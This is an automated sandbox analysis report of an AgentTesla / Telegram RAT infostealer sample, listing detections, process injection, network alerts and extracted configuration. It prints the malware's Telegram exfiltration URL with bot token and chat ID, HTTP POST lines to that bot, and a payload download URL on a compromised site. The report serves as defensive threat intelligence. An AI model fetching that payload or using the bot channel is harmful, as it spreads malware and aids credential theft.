Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LmIclOjfqc.exe

Overview

General Information

Sample name:LmIclOjfqc.exe
renamed because original name is a hash value
Original sample name:9bf21ab8b013ba06fcf025838cd0ac89278f7757d04c8713f3ca4223d75cbd3d.exe
Analysis ID:1617588
MD5:c4d834819273c01a996610613cb02a38
SHA1:8ddbf1662cf2d2284f84104b7a15d8173afd0078
SHA256:9bf21ab8b013ba06fcf025838cd0ac89278f7757d04c8713f3ca4223d75cbd3d
Tags:exeuser-Bastian455_
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • LmIclOjfqc.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\LmIclOjfqc.exe" MD5: C4D834819273C01A996610613CB02A38)
    • RegAsm.exe (PID: 7704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6977726739:AAGp2Z0CUd3iibdR5N0ybehkFND76B7HIFU/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6977726739:AAGp2Z0CUd3iibdR5N0ybehkFND76B7HIFU/sendMessage?chat_id=1070926352"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1954358252.0000000006DA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000004.00000002.4142445479.00000000028CC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              Click to see the 18 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.LmIclOjfqc.exe.6da0000.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.LmIclOjfqc.exe.6da0000.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.LmIclOjfqc.exe.3f83770.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.2.LmIclOjfqc.exe.3f83770.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      0.2.LmIclOjfqc.exe.3f83770.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                        Click to see the 9 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T02:22:35.407081+010028517791Malware Command and Control Activity Detected192.168.2.449739149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T02:22:35.407081+010028528151Malware Command and Control Activity Detected192.168.2.449739149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T02:22:35.407094+010028542811A Network Trojan was detected149.154.167.220443192.168.2.449739TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-02-18T02:22:35.202568+010018100081Potentially Bad Traffic192.168.2.449739149.154.167.220443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: LmIclOjfqc.exeAvira: detected
                        Antivirus detection for URL or domain
                        Source: https://www.new.eventawardsrussia.com/wp-includes/Xelqofwyqgn.pdfAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 4.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6977726739:AAGp2Z0CUd3iibdR5N0ybehkFND76B7HIFU/sendMessage?chat_id=1070926352"}
                        Source: RegAsm.exe.7704.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6977726739:AAGp2Z0CUd3iibdR5N0ybehkFND76B7HIFU/sendMessage"}
                        Multi AV Scanner detection for submitted file
                        Source: LmIclOjfqc.exeVirustotal: Detection: 53%Perma Link
                        Source: LmIclOjfqc.exeReversingLabs: Detection: 51%
                        Joe Sandbox ML detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: LmIclOjfqc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: LmIclOjfqc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1951861800.0000000005D40000.00000004.08000000.00040000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E59000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1951861800.0000000005D40000.00000004.08000000.00040000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E59000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: protobuf-net.pdb source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmp

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49739 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49739 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49739 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2854281 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound : 149.154.167.220:443 -> 192.168.2.4:49739
                        Uses the Telegram API (likely for C&C communication)
                        Source: unknownDNS query: name: api.telegram.org
                        Source: global trafficTCP traffic: 192.168.2.4:52436 -> 162.159.36.2:53
                        Source: global trafficHTTP traffic detected: GET /wp-includes/Xelqofwyqgn.pdf HTTP/1.1Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot6977726739:AAGp2Z0CUd3iibdR5N0ybehkFND76B7HIFU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4f90cfc8d16aHost: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                        Source: Joe Sandbox ViewIP Address: 5.23.51.54 5.23.51.54
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: unknownDNS query: name: api.ipify.org
                        Source: unknownDNS query: name: api.ipify.org
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                        Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficHTTP traffic detected: GET /wp-includes/Xelqofwyqgn.pdf HTTP/1.1Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                        Source: global trafficDNS traffic detected: DNS query: www.new.eventawardsrussia.com
                        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                        Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                        Source: unknownHTTP traffic detected: POST /bot6977726739:AAGp2Z0CUd3iibdR5N0ybehkFND76B7HIFU/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd4f90cfc8d16aHost: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
                        Source: LmIclOjfqc.exeString found in binary or memory: http://.css
                        Source: LmIclOjfqc.exeString found in binary or memory: http://.jpg
                        Source: RegAsm.exe, 00000004.00000002.4142445479.00000000028D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                        Source: LmIclOjfqc.exeString found in binary or memory: http://html4/loose.dtd
                        Source: LmIclOjfqc.exe, 00000000.00000002.1933083142.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4142445479.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4142445479.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                        Source: RegAsm.exe, 00000004.00000002.4142445479.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                        Source: RegAsm.exe, 00000004.00000002.4142445479.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                        Source: RegAsm.exe, 00000004.00000002.4142445479.00000000028D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4140823208.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4142445479.0000000002851000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6977726739:AAGp2Z0CUd3iibdR5N0ybehkFND76B7HIFU/
                        Source: RegAsm.exe, 00000004.00000002.4142445479.00000000028D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6977726739:AAGp2Z0CUd3iibdR5N0ybehkFND76B7HIFU/sendDocument
                        Source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                        Source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, LmIclOjfqc.exe, 00000000.00000002.1933083142.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: LmIclOjfqc.exe, 00000000.00000002.1933083142.0000000002E01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.new.eventawardsrussia.com
                        Source: LmIclOjfqc.exeString found in binary or memory: https://www.new.eventawardsrussia.com/wp-includes/Xelqofwyqgn.pdf
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 0.2.LmIclOjfqc.exe.3f83770.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.LmIclOjfqc.exe.3f83770.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_05DBA468 NtResumeThread,0_2_05DBA468
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_05DB6E20 NtProtectVirtualMemory,0_2_05DB6E20
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_05DBA460 NtResumeThread,0_2_05DBA460
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_05DB6E18 NtProtectVirtualMemory,0_2_05DB6E18
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_02C616F00_2_02C616F0
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_02C6BB080_2_02C6BB08
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_02C6C0980_2_02C6C098
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_02C61AD40_2_02C61AD4
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_02C61B8D0_2_02C61B8D
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_02C61B270_2_02C61B27
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_02C6196A0_2_02C6196A
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_05DB39100_2_05DB3910
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_05DB39000_2_05DB3900
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_076DF7880_2_076DF788
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_076DFA700_2_076DFA70
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_076DE6B80_2_076DE6B8
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_076C00400_2_076C0040
                        Source: C:\Users\user\Desktop\LmIclOjfqc.exeCode function: 0_2_076C00230_2_076C0023
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0273E1784_2_0273E178
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02734A384_2_02734A38
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0273DBA04_2_0273DBA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0273A9084_2_0273A908
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_02733E204_2_02733E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_027341684_2_02734168
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0629A8944_2_0629A894
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0629A5784_2_0629A578
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0629C0484_2_0629C048
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0629A8884_2_0629A888
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0629DBF04_2_0629DBF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B56404_2_062B5640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B7EA84_2_062B7EA8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B66884_2_062B6688
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062BC2B04_2_062BC2B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062BB34A4_2_062BB34A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B30F04_2_062B30F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B77B04_2_062B77B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B24084_2_062B2408
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062BE4E04_2_062BE4E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B5D7F4_2_062B5D7F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B00404_2_062B0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B71304_2_062B7130
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_062B001F4_2_062B001F
                        Source: LmIclOjfqc.exe, 00000000.00000002.1954560016.0000000006E90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000000.1681351024.0000000000B62000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePO-UTE-MX-873535363839939383635.exe` vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1933083142.0000000002E4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1932142934.000000000106E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E09000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1951861800.0000000005D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1953090808.00000000069D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMzeyslazx.dll" vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMzeyslazx.dll" vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1949261330.0000000003F83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef119f19a-1377-4d0a-b0c8-9bfc2a6f585a.exe4 vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exe, 00000000.00000002.1933083142.0000000003363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamef119f19a-1377-4d0a-b0c8-9bfc2a6f585a.exe4 vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exeBinary or memory string: OriginalFilenamePO-UTE-MX-873535363839939383635.exe` vs LmIclOjfqc.exe
                        Source: LmIclOjfqc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 0.2.LmIclOjfqc.exe.3f83770.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.LmIclOjfqc.exe.3f83770.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 0.2.LmIclOjfqc.exe.3e59570.2.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@4/3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                        Source: LmIclOjfqc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: LmIclOjfqc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
